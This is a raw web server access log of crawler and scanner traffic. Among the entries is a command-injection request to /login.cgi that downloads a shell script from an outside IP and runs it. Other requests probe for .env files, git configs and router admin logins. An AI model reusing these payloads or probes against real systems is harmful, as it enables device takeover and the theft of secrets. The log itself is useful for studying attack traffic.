156.59.198.136 - - [22/Feb/2025:17:30:17 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103251403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
137.184.85.24 - - [22/Feb/2025:17:32:43 +0100] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
137.184.85.24 - - [22/Feb/2025:17:33:04 +0100] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
137.184.85.24 - - [22/Feb/2025:17:33:33 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
141.255.166.90 - - [22/Feb/2025:17:33:43 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
193.68.89.10 - - [22/Feb/2025:17:36:44 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.0.162 - - [22/Feb/2025:17:45:37 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
156.59.198.136 - - [22/Feb/2025:17:46:47 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-tw.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
176.56.182.155 - - [22/Feb/2025:17:50:40 +0100] "GET /%7Eridersde/joomla/index.php HTTP/1.0" 404 386 "http://coffeenostra.castlegem.co.uk/%7Eridersde/joomla/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
176.56.182.155 - - [22/Feb/2025:17:50:40 +0100] "GET / HTTP/1.0" 200 423 "http://coffeenostra.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
156.59.198.135 - - [22/Feb/2025:18:15:33 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11951697.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:18:20:12 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11298047.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:18:45:10 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-tw.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:18:49:10 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11951794.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:18:53:20 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10425935.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.121.133.117 - - [22/Feb/2025:18:54:26 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [22/Feb/2025:18:57:20 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105031203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
212.124.169.212 - - [22/Feb/2025:18:58:20 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
156.59.198.136 - - [22/Feb/2025:19:01:22 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11170540.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:19:05:21 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10777758.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.121.84.7 - - [22/Feb/2025:19:19:37 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
46.101.170.14 - - [22/Feb/2025:19:21:23 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
46.101.170.14 - - [22/Feb/2025:19:21:23 +0100] "GET /odinhttpcall1740243001 HTTP/1.1" 404 367 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.170.14 - - [22/Feb/2025:19:21:23 +0100] "POST /sdk HTTP/1.1" 404 348 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.170.14 - - [22/Feb/2025:19:21:23 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
46.101.170.14 - - [22/Feb/2025:19:21:23 +0100] "GET /HNAP1 HTTP/1.1" 404 350 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.170.14 - - [22/Feb/2025:19:21:23 +0100] "GET /evox/about HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.170.14 - - [22/Feb/2025:19:21:23 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
46.101.170.14 - - [22/Feb/2025:19:21:23 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
159.223.21.172 - - [22/Feb/2025:19:21:24 +0100] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 350 "-" "Go-http-client/1.1"
164.92.245.47 - - [22/Feb/2025:19:21:24 +0100] "\x16\x03\x01" 400 383 "-" "-"
165.22.83.118 - - [22/Feb/2025:19:21:24 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 366 "-" "Go-http-client/1.1"
138.68.99.222 - - [22/Feb/2025:19:21:24 +0100] "GET /v2/_catalog HTTP/1.1" 404 356 "-" "Go-http-client/1.1"
164.92.249.32 - - [22/Feb/2025:19:21:24 +0100] "GET /solr/admin/info/system HTTP/1.1" 404 367 "-" "Go-http-client/1.1"
164.92.249.32 - - [22/Feb/2025:19:21:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.245.47 - - [22/Feb/2025:19:21:24 +0100] "\x16\x03\x01" 400 383 "-" "-"
164.92.249.32 - - [22/Feb/2025:19:21:24 +0100] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 361 "-" "Go-http-client/1.1"
167.71.218.57 - - [22/Feb/2025:19:21:24 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Go-http-client/1.1"
156.59.198.135 - - [22/Feb/2025:19:22:49 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109201103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
104.40.73.123 - - [22/Feb/2025:19:26:45 +0100] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
193.68.89.10 - - [22/Feb/2025:19:31:55 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [22/Feb/2025:20:05:04 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11951597.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:20:24:02 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/toolbar%20quick%20mode.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:20:28:02 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12001029.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:20:41:33 +0100] "GET /hausegger.activities.at/stats/lang/awstats-cn.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
205.210.31.154 - - [22/Feb/2025:20:54:28 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [22/Feb/2025:21:07:32 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12067379.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [22/Feb/2025:21:16:01 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [22/Feb/2025:21:27:34 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-ba.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.143.58 - - [22/Feb/2025:21:27:57 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [22/Feb/2025:21:31:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102051703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
114.119.152.142 - - [22/Feb/2025:21:48:43 +0100] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
156.59.198.135 - - [22/Feb/2025:21:58:25 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107181303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:22:02:26 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-cn.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:22:06:26 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12291722.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.140.17.52 - - [22/Feb/2025:22:12:41 +0100] "\x03" 400 383 "-" "-"
57.129.64.10 - - [22/Feb/2025:22:18:36 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
80.82.77.202 - - [22/Feb/2025:22:22:16 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.136 - - [22/Feb/2025:22:26:28 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912060903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [22/Feb/2025:22:29:04 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.2; es-US ) AppleWebKit/540.0 (KHTML like Gecko) Version/6.0 Safari/8900.00"
156.59.198.135 - - [22/Feb/2025:22:30:28 +0100] "GET /hausegger.activities.at/stats/lang/awstats-sr.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.255.166.90 - - [22/Feb/2025:22:32:34 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
109.236.61.99 - - [22/Feb/2025:22:33:43 +0100] "\xff" 400 383 "-" "-"
46.23.108.183 - - [22/Feb/2025:22:35:21 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0"
156.59.198.136 - - [22/Feb/2025:22:38:29 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-it.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [22/Feb/2025:22:46:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [22/Feb/2025:22:50:30 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104281503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
134.122.66.94 - - [22/Feb/2025:22:51:36 +0100] "\x16\x03\x01\x01$\x01" 400 383 "-" "-"
156.59.198.135 - - [22/Feb/2025:22:54:29 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-tr.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.178.110.163 - - [22/Feb/2025:22:58:55 +0100] "\x16\x03\x01" 400 383 "-" "-"
195.178.110.163 - - [22/Feb/2025:22:58:55 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
195.178.110.163 - - [22/Feb/2025:22:58:55 +0100] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
195.178.110.163 - - [22/Feb/2025:22:58:58 +0100] "GET /dev/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
195.178.110.163 - - [22/Feb/2025:22:58:59 +0100] "GET /.env.uat HTTP/1.1" 404 282 "-" "l9explore/1.2.2"
195.178.110.163 - - [22/Feb/2025:22:58:59 +0100] "GET /.env HTTP/1.1" 404 280 "-" "l9explore/1.2.2"
156.59.198.135 - - [22/Feb/2025:23:08:27 +0100] "GET /hausegger.activities.at/stats/lang/awstats-nn.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:23:17:13 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105181003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.255.166.90 - - [22/Feb/2025:23:17:39 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [22/Feb/2025:23:21:13 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12291769.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:23:44:49 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-ru.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:23:51:46 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910031003_RenOrder.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:23:55:45 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005141003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Feb/2025:00:00:35 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11503800.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Feb/2025:00:17:01 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103011003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
220.123.35.179 - - [23/Feb/2025:00:21:40 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
45.140.17.52 - - [23/Feb/2025:00:28:19 +0100] "\x03" 400 383 "-" "-"
156.59.198.135 - - [23/Feb/2025:00:50:09 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12043874.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Feb/2025:00:54:09 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11250524.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Feb/2025:00:58:09 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10659824.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"